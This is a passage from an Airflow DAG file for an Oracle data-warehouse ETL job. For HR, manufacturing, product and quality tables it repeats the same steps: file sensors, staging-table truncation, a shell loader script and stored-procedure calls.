bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_PERSONNEL_CATEGORY_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_PERSONNEL_CATEGORY_MAPPING"
UH_PERSONNEL_CATEGORY_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_PERSONNEL_SUBCATE_MAPPING_WH"
ODS_UH_PERSONNEL_SUBCATE_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_PERSONNEL_SUBCATE_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_PERSONNEL_SUBCATE_MAPPING_STG"
UH_PERSONNEL_SUBCATE_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_PERSONNEL_SUBCATE_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_PERSONNEL_SUBCATE_MAPPING_LD"
ODS_UH_PERSONNEL_SUBCATE_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_PERSONNEL_SUBCATE_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_PERSONNEL_SUBCATE_MAPPING"
UH_PERSONNEL_SUBCATE_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_EMPLOYMENTTYPE_MAPPING_WH"
ODS_UH_EMPLOYMENTTYPE_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_EMPLOYMENTTYPE_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_EMPLOYMENTTYPE_MAPPING_STG"
UH_EMPLOYMENTTYPE_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_EMPLOYMENTTYPE_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_EMPLOYMENTTYPE_MAPPING_LD"
ODS_UH_EMPLOYMENTTYPE_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_EMPLOYMENTTYPE_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_EMPLOYMENTTYPE_MAPPING"
UH_EMPLOYMENTTYPE_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_STAFFSTATUS_WH"
ODS_UH_STAFFSTATUS_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_STAFFSTATUS_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_STAFFSTATUS_STG"
UH_STAFFSTATUS_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_STAFFSTATUS"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_STAFFSTATUS_LD"
ODS_UH_STAFFSTATUS_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_STAFFSTATUS"
)
# JOB_TYPE=SQL
my_taskid = "UH_STAFFSTATUS"
UH_STAFFSTATUS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_STAFFSTATUS_TOBE_ONBOARD_WH"
ODS_UH_STAFFSTATUS_TOBE_ONBOARD_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_STAFFSTATUS_TOBE_ONBOARD_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_STAFFSTATUS_TOBE_ONBOARD_STG"
UH_STAFFSTATUS_TOBE_ONBOARD_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_STAFFSTATUS_TOBE_ONBOARD"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_STAFFSTATUS_TOBE_ONBOARD_LD"
ODS_UH_STAFFSTATUS_TOBE_ONBOARD_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_STAFFSTATUS_TOBE_ONBOARD"
)
# JOB_TYPE=SQL
my_taskid = "UH_STAFFSTATUS_TOBE_ONBOARD"
UH_STAFFSTATUS_TOBE_ONBOARD = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_GRADE_MAPPING_WH"
ODS_UH_GRADE_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_GRADE_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_GRADE_MAPPING_STG"
UH_GRADE_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_GRADE_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_GRADE_MAPPING_LD"
ODS_UH_GRADE_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_GRADE_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_GRADE_MAPPING"
UH_GRADE_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_EDUCATION_MAPPING_WH"
ODS_UH_EDUCATION_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_EDUCATION_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_EDUCATION_MAPPING_STG"
UH_EDUCATION_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_EDUCATION_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_EDUCATION_MAPPING_LD"
ODS_UH_EDUCATION_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_EDUCATION_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_EDUCATION_MAPPING"
UH_EDUCATION_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_RiskShipmentUpload_WH"
ODS_UM_RiskShipmentUpload_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_RiskShipmentUpload_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_RiskShipmentUpload_STG"
UM_RiskShipmentUpload_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_RiskShipmentUpload"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_RiskShipmentUpload_LD"
ODS_UM_RiskShipmentUpload_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_RiskShipmentUpload"
)
# JOB_TYPE=SQL
my_taskid = "UM_RiskShipmentUpload"
UM_RiskShipmentUpload = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_SMT_TIME_WH"
ODS_UM_SMT_TIME_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_SMT_TIME_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_SMT_TIME_STG"
UM_SMT_TIME_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_SMT_TIME"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_SMT_TIME_LD"
ODS_UM_SMT_TIME_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_SMT_TIME"
)
# JOB_TYPE=SQL
my_taskid = "UM_SMT_TIME"
UM_SMT_TIME = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_SMT_WH"
ODS_UM_SMT_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_SMT_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_SMT_STG"
UM_SMT_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_SMT"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_SMT_LD"
ODS_UM_SMT_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_SMT"
)
# JOB_TYPE=SQL
my_taskid = "UM_SMT"
UM_SMT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_ForecastUploadModel_WH"
ODS_UM_ForecastUploadModel_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_ForecastUploadModel_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_ForecastUploadModel_STG"
UM_ForecastUploadModel_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_ForecastUploadModel"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_ForecastUploadModel_LD"
ODS_UM_ForecastUploadModel_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_ForecastUploadModel"
)
# JOB_TYPE=SQL
my_taskid = "UM_ForecastUploadModel"
UM_ForecastUploadModel = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_Shift_WH"
ODS_UM_Shift_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_Shift_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_Shift_STG"
UM_Shift_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_Shift"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_Shift_LD"
ODS_UM_Shift_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_Shift"
)
# JOB_TYPE=SQL
my_taskid = "UM_Shift"
UM_Shift = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_Resource_Mapping_Process_WH"
ODS_UM_Resource_Mapping_Process_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_Resource_Mapping_Process_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_Resource_Mapping_Process_STG"
UM_Resource_Mapping_Process_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_Resource_Mapping_Process"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_Resource_Mapping_Process_LD"
ODS_UM_Resource_Mapping_Process_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_Resource_Mapping_Process"
)
# JOB_TYPE=SQL
my_taskid = "UM_Resource_Mapping_Process"
UM_Resource_Mapping_Process = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_Work_in_Process_Category_WH"
ODS_UM_Work_in_Process_Category_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_Work_in_Process_Category_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_Work_in_Process_Category_STG"
UM_Work_in_Process_Category_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_Work_in_Process_Category"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_Work_in_Process_Category_LD"
ODS_UM_Work_in_Process_Category_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_Work_in_Process_Category"
)
# JOB_TYPE=SQL
my_taskid = "UM_Work_in_Process_Category"
UM_Work_in_Process_Category = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UP_consign_vendor_prod_map_WH"
ODS_UP_consign_vendor_prod_map_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_PRD,
filepath= "{{ var.value.DIR_SOURCE }}UPD/PRD/UP_consign_vendor_prod_map_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UP_consign_vendor_prod_map_STG"
UP_consign_vendor_prod_map_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD,
sql= "TRUNCATE TABLE STAGE.UP_consign_vendor_prod_map"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UP_consign_vendor_prod_map_LD"
ODS_UP_consign_vendor_prod_map_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_PRD,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD PRD UP_consign_vendor_prod_map"
)
# JOB_TYPE=SQL
my_taskid = "UP_consign_vendor_prod_map"
UP_consign_vendor_prod_map = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UP_Expense_Budget_prod_map_WH"
ODS_UP_Expense_Budget_prod_map_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_PRD,
filepath= "{{ var.value.DIR_SOURCE }}UPD/PRD/UP_Expense_Budget_prod_map_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UP_Expense_Budget_prod_map_STG"
UP_Expense_Budget_prod_map_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD,
sql= "TRUNCATE TABLE STAGE.UP_Expense_Budget_prod_map"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UP_Expense_Budget_prod_map_LD"
ODS_UP_Expense_Budget_prod_map_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_PRD,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD PRD UP_Expense_Budget_prod_map"
)
# JOB_TYPE=SQL
my_taskid = "UP_Expense_Budget_prod_map"
UP_Expense_Budget_prod_map = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_MtlScrapCost_WH"
ODS_UQ_MtlScrapCost_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_MtlScrapCost_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_MtlScrapCost_STG"
UQ_MtlScrapCost_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_MtlScrapCost"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_MtlScrapCost_LD"
ODS_UQ_MtlScrapCost_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_MtlScrapCost"
)
# JOB_TYPE=SQL
my_taskid = "UQ_MtlScrapCost"
UQ_MtlScrapCost = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_CSDCustomerPaidService_WH"
ODS_UQ_CSDCustomerPaidService_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_CSDCustomerPaidService_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_CSDCustomerPaidService_STG"
UQ_CSDCustomerPaidService_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_CSDCustomerPaidService"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_CSDCustomerPaidService_LD"
ODS_UQ_CSDCustomerPaidService_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_CSDCustomerPaidService"
)
# JOB_TYPE=SQL
my_taskid = "UQ_CSDCustomerPaidService"
UQ_CSDCustomerPaidService = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_CSDPlannedShippingQty_WH"
ODS_UQ_CSDPlannedShippingQty_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_CSDPlannedShippingQty_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_CSDPlannedShippingQty_STG"
UQ_CSDPlannedShippingQty_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_CSDPlannedShippingQty"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_CSDPlannedShippingQty_LD"
ODS_UQ_CSDPlannedShippingQty_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_CSDPlannedShippingQty"
)
# JOB_TYPE=SQL
my_taskid = "UQ_CSDPlannedShippingQty"
UQ_CSDPlannedShippingQty = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_InventoryOwner_WH"
ODS_UQ_InventoryOwner_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_InventoryOwner_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_InventoryOwner_STG"
UQ_InventoryOwner_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_InventoryOwner"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_InventoryOwner_LD"
ODS_UQ_InventoryOwner_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_InventoryOwner"
)
# JOB_TYPE=SQL
my_taskid = "UQ_InventoryOwner"
UQ_InventoryOwner = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_OnSiteReworkQty_WH"
ODS_UQ_OnSiteReworkQty_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_OnSiteReworkQty_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_OnSiteReworkQty_STG"
UQ_OnSiteReworkQty_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_OnSiteReworkQty"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_OnSiteReworkQty_LD"
ODS_UQ_OnSiteReworkQty_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_OnSiteReworkQty"
)
# JOB_TYPE=SQL
my_taskid = "UQ_OnSiteReworkQty"
UQ_OnSiteReworkQty = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_QualityReturnQty_WH"
ODS_UQ_QualityReturnQty_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_QualityReturnQty_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_QualityReturnQty_STG"
UQ_QualityReturnQty_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_QualityReturnQty"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_QualityReturnQty_LD"
